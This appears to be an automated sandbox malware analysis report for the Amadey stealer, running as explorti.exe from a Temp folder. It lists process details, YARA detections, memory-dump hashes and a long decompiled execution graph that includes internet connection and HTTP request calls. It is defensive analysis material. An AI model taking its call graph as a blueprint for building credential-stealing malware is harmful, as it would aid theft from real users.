                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0xa00000
                    File size:1'884'672 bytes
                    MD5 hash:457D9A15D305DF62FE34C5076F3CAD9D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:14:09:00
                    Start date:01/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0xa00000
                    File size:1'884'672 bytes
                    MD5 hash:457D9A15D305DF62FE34C5076F3CAD9D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48a93cb2d840f96a353fd51b2aa1cf2fed3d35a3751bd833454343d1961ffd5c
                      • Instruction ID: 86bad6376bfa9267998734e16e6433134b710634fab8df31f828c4ed0c33f221
                      • Opcode Fuzzy Hash: 48a93cb2d840f96a353fd51b2aa1cf2fed3d35a3751bd833454343d1961ffd5c
                      • Instruction Fuzzy Hash: 7E014CEF18C111BD7082C5816B189FAAB6FE5E7B3037084BBF44AC2506E6D54A4E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35818c3a045e89bb19b60679719859aefee02af94d7f627a780511e9d952db2e
                      • Instruction ID: e1ed6397f2f55962a2151dd1d8f4592b42f9a3f96f021fe7e5b4203bf7f95f5a
                      • Opcode Fuzzy Hash: 35818c3a045e89bb19b60679719859aefee02af94d7f627a780511e9d952db2e
                      • Instruction Fuzzy Hash: 7A1104BF58E250ADB142C5616A18AFB7F2EE5D3A3033148ABF45ACA042E2944A4F9171
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79ba515b7599ec4258b5eb1d3044eb04a7792c83e800bb22d84a882c819750da
                      • Instruction ID: a58ebc63692b51ea8f988086fc05dcbcbbe467cab44dc0f82256b791a0cc0ebd
                      • Opcode Fuzzy Hash: 79ba515b7599ec4258b5eb1d3044eb04a7792c83e800bb22d84a882c819750da
                      • Instruction Fuzzy Hash: 65011AFF18D110BDB082C5816B189FAAB6FE5D7B3033184BBF44AC2506E6D58A4E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3919c20cc24086de7911b03fb7a207c7cdc70793f356e29b4371cacc7031bd32
                      • Instruction ID: 60386c4d34bdc0c70fb3811dcfab8f308237f7cfb2d6cf3185df62f0f6414731
                      • Opcode Fuzzy Hash: 3919c20cc24086de7911b03fb7a207c7cdc70793f356e29b4371cacc7031bd32
                      • Instruction Fuzzy Hash: 5001E8EF189110ADB082C1926B189FAAF6EE4E2730331887BF44AC2506E6D54B4E6031
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 93792207c8aac391a108f6c870b6f0c1adfdfdb84989272dcb14708f737caaf3
                      • Instruction ID: 1cfa036ac6d4114dd9f84a461c3c62ad2ef3b06589ff31670e634787b2c26ba8
                      • Opcode Fuzzy Hash: 93792207c8aac391a108f6c870b6f0c1adfdfdb84989272dcb14708f737caaf3
                      • Instruction Fuzzy Hash: 87F031FF58D110BD7041C19237189FAAB6FE1D2B30331C47BF80AC2542E6D54A4E5031
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9da2d4b85a67c969e7eb79e271bc23a6294610f14a41e1b2bf5bab1acd6b3423
                      • Instruction ID: d3c8042661a8303e7161b4f4fb4255cd35f53edfcd375dce51e89aaf4c8a0f9c
                      • Opcode Fuzzy Hash: 9da2d4b85a67c969e7eb79e271bc23a6294610f14a41e1b2bf5bab1acd6b3423
                      • Instruction Fuzzy Hash: D7F0A4FF14C110ADF14281912B1C9FAAB2EE5E363033084BBF446C2102E2D54B0E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 738e371d61b9b99b831b6eca3c0f4d8bd7e438d166afc51ef3e869e271ec0dfc
                      • Instruction ID: f06084a463d0049c81608add50f743f4f9387822d4e6df3a23f3f24d87cdc8d2
                      • Opcode Fuzzy Hash: 738e371d61b9b99b831b6eca3c0f4d8bd7e438d166afc51ef3e869e271ec0dfc
                      • Instruction Fuzzy Hash: 7FE0C0EF58D0106D7045D5927B2C9FA6B2EE0D26303318877F446C5406E6C54B4F2071
                      Memory Dump Source
                      • Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_54c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0cb8e58b144042fa657c5f94587ab14a6afd89b1fb7b17576c337b98e3331d1
                      • Instruction ID: 362e45c4c9fd85765eca9db964de45edef62cd6ae2047551a9e611afee28caca
                      • Opcode Fuzzy Hash: d0cb8e58b144042fa657c5f94587ab14a6afd89b1fb7b17576c337b98e3331d1
                      • Instruction Fuzzy Hash: 6FF044AE54E2A1DE86D6C5B5129D1EA3FA7A6B323032015AFD08BC6B42D24B06868150

                      Execution Graph

                      Execution Coverage:14.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.1%
                      Total number of Nodes:1928
                      Total number of Limit Nodes:105
                      execution_graph 12991 a08a60 GetTempPathA 13002 a17870 12991->13002 12993 a08abc 13013 a05b20 12993->13013 12995 a08ac7 13020 a17f30 12995->13020 12997 a08b13 12998 a17f30 RtlAllocateHeap 12997->12998 12999 a08b65 12998->12999 13033 a18150 12999->13033 13001 a08b77 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13003 a17896 13002->13003 13004 a1789d 13003->13004 13005 a178f1 13003->13005 13006 a178d2 13003->13006 13004->12993 13009 a1d312 RtlAllocateHeap 13005->13009 13012 a178df __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13005->13012 13007 a17929 13006->13007 13008 a178d9 13006->13008 13049 a02440 13007->13049 13041 a1d312 13008->13041 13009->13012 13012->12993 13061 a05850 13013->13061 13017 a05b7a 13080 a04af0 13017->13080 13019 a05b8b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13019->12995 13021 a17f4e 13020->13021 13023 a17f74 13020->13023 13021->12997 13022 a191a0 RtlAllocateHeap 13024 a18063 13022->13024 13025 a17fc8 13023->13025 13026 a17fed 13023->13026 13031 a17fd9 13023->13031 13027 a02440 RtlAllocateHeap 13024->13027 13025->13024 13029 a1d312 RtlAllocateHeap 13025->13029 13030 a1d312 RtlAllocateHeap 13026->13030 13026->13031 13028 a18068 13027->13028 13029->13031 13030->13031 13031->13022 13032 a18040 shared_ptr 13031->13032 13032->12997 13034 a18178 13033->13034 13036 a181c2 13033->13036 13035 a18181 13034->13035 13034->13036 13127 a191b0 13035->13127 13038 a181d1 13036->13038 13132 a18e70 13036->13132 13038->13001 13040 a1818a 13040->13001 13044 a1d317 __cftof 13041->13044 13043 a1d331 13043->13012 13044->13043 13045 a02440 std::_Throw_future_error 13044->13045 13053 a38aa4 13044->13053 13048 a1d33d std::_Throw_future_error 13045->13048 13057 a337dc 13045->13057 13047 a02483 13047->13012 13048->13012 13050 a0244e std::_Throw_future_error 13049->13050 13051 a337dc ___std_exception_copy RtlAllocateHeap 13050->13051 13052 a02483 13051->13052 13052->13012 13056 a3af0b __cftof 13053->13056 13054 a3af34 RtlAllocateHeap 13055 a3af47 __dosmaperr 13054->13055 13054->13056 13055->13044 13056->13054 13056->13055 13058 a33806 ___std_exception_destroy ___std_exception_copy 13057->13058 13059 a337e9 13057->13059 13058->13047 13059->13058 13060 a38aa4 ___std_exception_copy RtlAllocateHeap 13059->13060 13060->13058 13087 a17df0 13061->13087 13063 a0587b 13064 a058f0 13063->13064 13065 a17df0 RtlAllocateHeap 13064->13065 13078 a05955 13065->13078 13066 a17870 RtlAllocateHeap 13066->13078 13067 a05b19 13118 a18070 13067->13118 13068 a05aed __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13068->13017 13070 a17f30 RtlAllocateHeap 13070->13078 13073 a05850 RtlAllocateHeap 13074 a05b64 13073->13074 13075 a058f0 RtlAllocateHeap 13074->13075 13076 a05b7a 13075->13076 13077 a04af0 RtlAllocateHeap 13076->13077 13079 a05b8b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13077->13079 13078->13066 13078->13067 13078->13068 13078->13070 13112 a05640 13078->13112 13079->13017 13081 a04b24 13080->13081 13082 a04b4e 13080->13082 13083 a17f30 RtlAllocateHeap 13081->13083 13085 a17df0 RtlAllocateHeap 13082->13085 13084 a04b3b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13083->13084 13084->13019 13086 a04bab __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13085->13086 13086->13019 13089 a17e37 13087->13089 13090 a17e0e __cftof 13087->13090 13092 a17e8b 13089->13092 13093 a17eae 13089->13093 13098 a17e9c __cftof 13089->13098 13090->13063 13091 a17f28 13094 a02440 RtlAllocateHeap 13091->13094 13092->13091 13096 a1d312 RtlAllocateHeap 13092->13096 13097 a1d312 RtlAllocateHeap 13093->13097 13093->13098 13095 a17f2d 13094->13095 13096->13098 13097->13098 13099 a17f05 shared_ptr 13098->13099 13100 a191a0 13098->13100 13099->13063 13103 a1c0e9 13100->13103 13106 a1c053 13103->13106 13105 a1c0fa std::_Throw_future_error 13109 a022a0 13106->13109 13108 a1c065 13108->13105 13110 a337dc ___std_exception_copy RtlAllocateHeap 13109->13110 13111 a022d7 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13110->13111 13111->13108 13113 a05770 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13112->13113 13117 a056a9 shared_ptr 13112->13117 13113->13078 13114 a0583a 13116 a18070 RtlAllocateHeap 13114->13116 13115 a17f30 RtlAllocateHeap 13115->13117 13116->13113 13117->13113 13117->13114 13117->13115 13121 a1c109 13118->13121 13120 a05b1e 13120->13073 13124 a1c08d 13121->13124 13123 a1c11a std::_Throw_future_error 13123->13120 13125 a022a0 std::invalid_argument::invalid_argument RtlAllocateHeap 13124->13125 13126 a1c09f 13125->13126 13126->13123 13128 a191c4 13127->13128 13131 a191d5 13128->13131 13150 a19410 13128->13150 13130 a1925b 13130->13040 13131->13040 13133 a18e9b 13132->13133 13134 a18fbe 13132->13134 13138 a18ee2 13133->13138 13139 a18f0c 13133->13139 13135 a191a0 RtlAllocateHeap 13134->13135 13136 a18fc3 13135->13136 13137 a02440 RtlAllocateHeap 13136->13137 13143 a18ef3 13137->13143 13138->13136 13140 a18eed 13138->13140 13141 a1d312 RtlAllocateHeap 13139->13141 13139->13143 13142 a1d312 RtlAllocateHeap 13140->13142 13141->13143 13142->13143 13144 a18fe8 13143->13144 13146 a18f7c shared_ptr 13143->13146 13147 a02440 std::_Throw_future_error 13143->13147 13145 a1d312 RtlAllocateHeap 13144->13145 13145->13146 13146->13038 13148 a337dc ___std_exception_copy RtlAllocateHeap 13147->13148 13149 a02483 13148->13149 13149->13038 13151 a19549 13150->13151 13152 a1943b 13150->13152 13153 a191a0 RtlAllocateHeap 13151->13153 13156 a19482 13152->13156 13157 a194a9 13152->13157 13154 a1954e 13153->13154 13155 a02440 RtlAllocateHeap 13154->13155 13161 a19493 shared_ptr 13155->13161 13156->13154 13158 a1948d 13156->13158 13160 a1d312 RtlAllocateHeap 13157->13160 13157->13161 13159 a1d312 RtlAllocateHeap 13158->13159 13159->13161 13160->13161 13161->13130 13437 a090e0 13438 a09115 13437->13438 13439 a17f30 RtlAllocateHeap 13438->13439 13440 a09148 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13439->13440 14688 a0c800 14689 a0c857 14688->14689 14694 a18d10 14689->14694 14691 a0c86c 14692 a18d10 RtlAllocateHeap 14691->14692 14693 a0c8a8 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14692->14693 14695 a18d35 14694->14695 14696 a18e5f 14694->14696 14700 a18da6 14695->14700 14701 a18d7c 14695->14701 14697 a191a0 RtlAllocateHeap 14696->14697 14698 a18e64 14697->14698 14699 a02440 RtlAllocateHeap 14698->14699 14705 a18d8d shared_ptr __cftof 14699->14705 14704 a1d312 RtlAllocateHeap 14700->14704 14700->14705 14701->14698 14702 a18d87 14701->14702 14703 a1d312 RtlAllocateHeap 14702->14703 14703->14705 14704->14705 14705->14691 14706 a07400 14707 a17870 RtlAllocateHeap 14706->14707 14708 a07435 14707->14708 14709 a17870 RtlAllocateHeap 14708->14709 14710 a07448 14709->14710 14711 a17870 RtlAllocateHeap 14710->14711 14712 a07458 14711->14712 14713 a17870 RtlAllocateHeap 14712->14713 14714 a0746d 14713->14714 14715 a17870 RtlAllocateHeap 14714->14715 14716 a07482 14715->14716 14717 a17870 RtlAllocateHeap 14716->14717 14719 a07494 shared_ptr 14717->14719 14718 a0752f __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14719->14718 14720 a0762e 14719->14720 14730 a1d041 14719->14730 14722 a17f30 RtlAllocateHeap 14720->14722 14723 a0764a 14722->14723 14724 a17f30 RtlAllocateHeap 14723->14724 14725 a07663 14724->14725 14726 a17f30 RtlAllocateHeap 14725->14726 14729 a0767c shared_ptr 14726->14729 14727 a075bd 14727->14720 14734 a1cff7 14727->14734 14732 a1d052 14730->14732 14731 a1d05a 14731->14727 14732->14731 14738 a1d0c9 14732->14738 14736 a1d007 14734->14736 14735 a1d0af 14735->14720 14736->14735 14737 a1d0ab RtlWakeAllConditionVariable 14736->14737 14737->14720 14739 a1d0d7 SleepConditionVariableCS 14738->14739 14741 a1d0f0 14738->14741 14739->14741 14741->14732 14979 a06d40 14980 a06d80 14979->14980 14981 a06d9a 14980->14981 14983 a06dc5 14980->14983 14982 a17f30 RtlAllocateHeap 14981->14982 14985 a06dbb shared_ptr 14982->14985 14984 a17f30 RtlAllocateHeap 14983->14984 14984->14985 13441 a16ae0 13443 a16b10 13441->13443 13442 a17870 RtlAllocateHeap 13442->13443 13443->13442 13444 a05b20 RtlAllocateHeap 13443->13444 13446 a146c0 13443->13446 13444->13443 13447 a146fb 13446->13447 13556 a14d80 shared_ptr 13446->13556 13449 a17870 RtlAllocateHeap 13447->13449 13447->13556 13448 a14e69 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13448->13443 13450 a1471c 13449->13450 13451 a05b20 RtlAllocateHeap 13450->13451 13452 a14723 13451->13452 13454 a17870 RtlAllocateHeap 13452->13454 13456 a14735 13454->13456 13455 a14f25 13775 a06920 13455->13775 13457 a17870 RtlAllocateHeap 13456->13457 13459 a14747 13457->13459 13704 a0bd60 13459->13704 13461 a14753 13464 a17870 RtlAllocateHeap 13461->13464 13462 a14fee shared_ptr 13785 a07d00 13462->13785 13463 a14f35 shared_ptr 13463->13462 13502 a16ab6 13463->13502 13466 a14768 13464->13466 13469 a17870 RtlAllocateHeap 13466->13469 13467 a14ffd 13850 a04570 13467->13850 13471 a14780 13469->13471 13470 a1500a 13854 a082b0 13470->13854 13473 a05b20 RtlAllocateHeap 13471->13473 13475 a14787 13473->13475 13474 a15016 13476 a04570 RtlAllocateHeap 13474->13476 13726 a084b0 13475->13726 13479 a15023 13476->13479 13478 a17870 RtlAllocateHeap 13478->13502 13483 a04570 RtlAllocateHeap 13479->13483 13480 a14793 13481 a17870 RtlAllocateHeap 13480->13481 13563 a14a0d 13480->13563 13484 a147af 13481->13484 13482 a17870 RtlAllocateHeap 13485 a14a3f 13482->13485 13487 a15040 13483->13487 13488 a17870 RtlAllocateHeap 13484->13488 13486 a17870 RtlAllocateHeap 13485->13486 13490 a14a54 13486->13490 13492 a17870 RtlAllocateHeap 13487->13492 13489 a147c7 13488->13489 13493 a05b20 RtlAllocateHeap 13489->13493 13494 a17870 RtlAllocateHeap 13490->13494 13491 a05b20 RtlAllocateHeap 13491->13502 13495 a1505e 13492->13495 13496 a147ce 13493->13496 13497 a14a66 13494->13497 13499 a05b20 RtlAllocateHeap 13495->13499 13500 a084b0 RtlAllocateHeap 13496->13500 13501 a0bd60 5 API calls 13497->13501 13498 a146c0 17 API calls 13498->13502 13503 a15065 13499->13503 13504 a147da 13500->13504 13505 a14a72 13501->13505 13502->13478 13502->13491 13502->13498 13506 a17870 RtlAllocateHeap 13503->13506 13510 a17870 RtlAllocateHeap 13504->13510 13504->13563 13507 a17870 RtlAllocateHeap 13505->13507 13508 a1507a 13506->13508 13511 a14a87 13507->13511 13509 a05b20 RtlAllocateHeap 13508->13509 13518 a15081 13509->13518 13512 a147f7 13510->13512 13513 a17870 RtlAllocateHeap 13511->13513 13514 a05b20 RtlAllocateHeap 13512->13514 13515 a14a9f 13513->13515 13520 a147ff 13514->13520 13516 a05b20 RtlAllocateHeap 13515->13516 13517 a14aa6 13516->13517 13519 a084b0 RtlAllocateHeap 13517->13519 13522 a17f30 RtlAllocateHeap 13518->13522 13521 a14ab2 13519->13521 13523 a17f30 RtlAllocateHeap 13520->13523 13524 a17870 RtlAllocateHeap 13521->13524 13521->13556 13532 a150fd 13522->13532 13531 a14869 shared_ptr 13523->13531 13525 a14ace 13524->13525 13526 a17870 RtlAllocateHeap 13525->13526 13527 a14ae6 13526->13527 13528 a05b20 RtlAllocateHeap 13527->13528 13530 a14aed 13528->13530 13529 a17870 RtlAllocateHeap 13533 a148f6 13529->13533 13534 a084b0 RtlAllocateHeap 13530->13534 13531->13529 13866 a17c50 13532->13866 13536 a05b20 RtlAllocateHeap 13533->13536 13537 a14af9 13534->13537 13541 a148fe 13536->13541 13540 a17870 RtlAllocateHeap 13537->13540 13537->13556 13538 a15169 13879 a18090 13538->13879 13542 a14b16 13540->13542 13543 a17f30 RtlAllocateHeap 13541->13543 13544 a05b20 RtlAllocateHeap 13542->13544 13547 a14959 shared_ptr 13543->13547 13546 a14b1e 13544->13546 13545 a151a5 shared_ptr 13552 a17f30 RtlAllocateHeap 13545->13552 13548 a14ea7 13546->13548 13549 a14b6a 13546->13549 13547->13563 13884 a09820 13547->13884 13553 a18070 RtlAllocateHeap 13548->13553 13551 a17f30 RtlAllocateHeap 13549->13551 13564 a14b88 shared_ptr 13551->13564 13561 a1526d shared_ptr 13552->13561 13554 a14eac 13553->13554 13555 a1c109 RtlAllocateHeap 13554->13555 13555->13556 13556->13448 13753 a065b0 13556->13753 13557 a149e5 __dosmaperr 13557->13563 13889 a38979 13557->13889 13559 a17870 RtlAllocateHeap 13560 a14c15 13559->13560 13565 a05b20 RtlAllocateHeap 13560->13565 13562 a04570 RtlAllocateHeap 13561->13562 13566 a1530d 13562->13566 13563->13482 13563->13554 13564->13556 13564->13559 13570 a14c1d 13565->13570 13567 a17870 RtlAllocateHeap 13566->13567 13568 a15327 13567->13568 13569 a05b20 RtlAllocateHeap 13568->13569 13571 a15332 13569->13571 13572 a17f30 RtlAllocateHeap 13570->13572 13573 a04570 RtlAllocateHeap 13571->13573 13577 a14c78 shared_ptr 13572->13577 13574 a15347 13573->13574 13575 a17870 RtlAllocateHeap 13574->13575 13576 a1535b 13575->13576 13578 a05b20 RtlAllocateHeap 13576->13578 13577->13556 13579 a17870 RtlAllocateHeap 13577->13579 13580 a15366 13578->13580 13581 a14d07 13579->13581 13582 a17870 RtlAllocateHeap 13580->13582 13583 a17870 RtlAllocateHeap 13581->13583 13584 a15384 13582->13584 13585 a14d1c 13583->13585 13586 a05b20 RtlAllocateHeap 13584->13586 13587 a17870 RtlAllocateHeap 13585->13587 13588 a1538f 13586->13588 13589 a14d37 13587->13589 13590 a17870 RtlAllocateHeap 13588->13590 13591 a05b20 RtlAllocateHeap 13589->13591 13592 a153ad 13590->13592 13593 a14d3e 13591->13593 13594 a05b20 RtlAllocateHeap 13592->13594 13597 a17f30 RtlAllocateHeap 13593->13597 13595 a153b8 13594->13595 13596 a17870 RtlAllocateHeap 13595->13596 13599 a153d6 13596->13599 13598 a14d77 13597->13598 13732 a142a0 13598->13732 13601 a05b20 RtlAllocateHeap 13599->13601 13602 a153e1 13601->13602 13603 a17870 RtlAllocateHeap 13602->13603 13604 a153ff 13603->13604 13605 a05b20 RtlAllocateHeap 13604->13605 13606 a1540a 13605->13606 13607 a17870 RtlAllocateHeap 13606->13607 13608 a15428 13607->13608 13609 a05b20 RtlAllocateHeap 13608->13609 13610 a15433 13609->13610 13611 a17870 RtlAllocateHeap 13610->13611 13612 a15451 13611->13612 13613 a05b20 RtlAllocateHeap 13612->13613 13614 a1545c 13613->13614 13615 a17870 RtlAllocateHeap 13614->13615 13616 a1547a 13615->13616 13617 a05b20 RtlAllocateHeap 13616->13617 13618 a15485 13617->13618 13619 a17870 RtlAllocateHeap 13618->13619 13620 a154a1 13619->13620 13621 a05b20 RtlAllocateHeap 13620->13621 13622 a154ac 13621->13622 13623 a17870 RtlAllocateHeap 13622->13623 13624 a154c3 13623->13624 13625 a05b20 RtlAllocateHeap 13624->13625 13626 a154ce 13625->13626 13627 a17870 RtlAllocateHeap 13626->13627 13628 a154e5 13627->13628 13629 a05b20 RtlAllocateHeap 13628->13629 13630 a154f0 13629->13630 13631 a17870 RtlAllocateHeap 13630->13631 13632 a1550c 13631->13632 13633 a05b20 RtlAllocateHeap 13632->13633 13634 a15517 13633->13634 13893 a18250 13634->13893 13636 a1552b 13637 a18150 RtlAllocateHeap 13636->13637 13638 a1553f 13637->13638 13639 a18150 RtlAllocateHeap 13638->13639 13640 a15553 13639->13640 13641 a18150 RtlAllocateHeap 13640->13641 13642 a15567 13641->13642 13643 a18250 RtlAllocateHeap 13642->13643 13644 a1557b 13643->13644 13645 a18150 RtlAllocateHeap 13644->13645 13646 a1558f 13645->13646 13647 a18250 RtlAllocateHeap 13646->13647 13648 a155a3 13647->13648 13649 a18150 RtlAllocateHeap 13648->13649 13650 a155b7 13649->13650 13651 a18250 RtlAllocateHeap 13650->13651 13652 a155cb 13651->13652 13653 a18150 RtlAllocateHeap 13652->13653 13654 a155df 13653->13654 13655 a18250 RtlAllocateHeap 13654->13655 13656 a155f3 13655->13656 13657 a18150 RtlAllocateHeap 13656->13657 13658 a15607 13657->13658 13659 a18250 RtlAllocateHeap 13658->13659 13660 a1561b 13659->13660 13661 a18150 RtlAllocateHeap 13660->13661 13662 a1562f 13661->13662 13663 a18250 RtlAllocateHeap 13662->13663 13664 a15643 13663->13664 13665 a18150 RtlAllocateHeap 13664->13665 13666 a15657 13665->13666 13667 a18250 RtlAllocateHeap 13666->13667 13668 a1566b 13667->13668 13669 a18150 RtlAllocateHeap 13668->13669 13670 a1567f 13669->13670 13671 a18250 RtlAllocateHeap 13670->13671 13672 a15693 13671->13672 13673 a18150 RtlAllocateHeap 13672->13673 13674 a156a7 13673->13674 13675 a18150 RtlAllocateHeap 13674->13675 13676 a156bb 13675->13676 13677 a18150 RtlAllocateHeap 13676->13677 13678 a156cf 13677->13678 13679 a18250 RtlAllocateHeap 13678->13679 13682 a156e3 shared_ptr 13679->13682 13680 a16377 13684 a17870 RtlAllocateHeap 13680->13684 13681 a164cb 13683 a17870 RtlAllocateHeap 13681->13683 13682->13680 13682->13681 13685 a164e0 13683->13685 13686 a1638d 13684->13686 13687 a17870 RtlAllocateHeap 13685->13687 13688 a05b20 RtlAllocateHeap 13686->13688 13689 a164f5 13687->13689 13690 a16398 13688->13690 13897 a04960 13689->13897 13692 a18250 RtlAllocateHeap 13690->13692 13703 a163ac __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13692->13703 13693 a16504 13904 a175d0 13693->13904 13695 a16646 13696 a17870 RtlAllocateHeap 13695->13696 13697 a1665c 13696->13697 13698 a05b20 RtlAllocateHeap 13697->13698 13700 a16667 13698->13700 13699 a1654b 13699->13695 13701 a18bd0 RtlAllocateHeap 13699->13701 13702 a18150 RtlAllocateHeap 13700->13702 13701->13699 13702->13703 13703->13443 13705 a0c1a1 13704->13705 13706 a0bdb2 13704->13706 13707 a17f30 RtlAllocateHeap 13705->13707 13706->13705 13708 a0bdc6 InternetOpenW InternetConnectA 13706->13708 13712 a0c14e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13707->13712 13709 a17870 RtlAllocateHeap 13708->13709 13710 a0be3d 13709->13710 13711 a05b20 RtlAllocateHeap 13710->13711 13714 a0be48 shared_ptr 13711->13714 13712->13461 13713 a17870 RtlAllocateHeap 13715 a0bed9 13713->13715 13714->13713 13716 a05b20 RtlAllocateHeap 13715->13716 13717 a0bee4 13716->13717 13718 a17870 RtlAllocateHeap 13717->13718 13719 a0befd 13718->13719 13720 a05b20 RtlAllocateHeap 13719->13720 13721 a0bf08 HttpSendRequestA 13720->13721 13724 a0bf2b shared_ptr 13721->13724 13723 a0bfb3 InternetReadFile 13725 a0bfda 13723->13725 13724->13723 13730 a085d0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13726->13730 13731 a08505 shared_ptr 13726->13731 13727 a08697 13728 a18070 RtlAllocateHeap 13727->13728 13728->13730 13729 a17f30 RtlAllocateHeap 13729->13731 13730->13480 13731->13727 13731->13729 13731->13730 13733 a17870 RtlAllocateHeap 13732->13733 13734 a142e2 13733->13734 13735 a17870 RtlAllocateHeap 13734->13735 13736 a142f4 13735->13736 13737 a084b0 RtlAllocateHeap 13736->13737 13738 a142fd 13737->13738 13739 a14556 13738->13739 13750 a14308 shared_ptr 13738->13750 13740 a17870 RtlAllocateHeap 13739->13740 13741 a14567 13740->13741 13742 a17870 RtlAllocateHeap 13741->13742 13743 a1457c 13742->13743 13744 a17870 RtlAllocateHeap 13743->13744 13745 a1458e 13744->13745 13747 a13550 15 API calls 13745->13747 13746 a191b0 RtlAllocateHeap 13746->13750 13748 a14520 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13747->13748 13748->13556 13749 a17870 RtlAllocateHeap 13749->13750 13750->13746 13750->13748 13750->13749 13752 a17f30 RtlAllocateHeap 13750->13752 13916 a13550 13750->13916 13752->13750 13754 a0660f 13753->13754 13755 a17870 RtlAllocateHeap 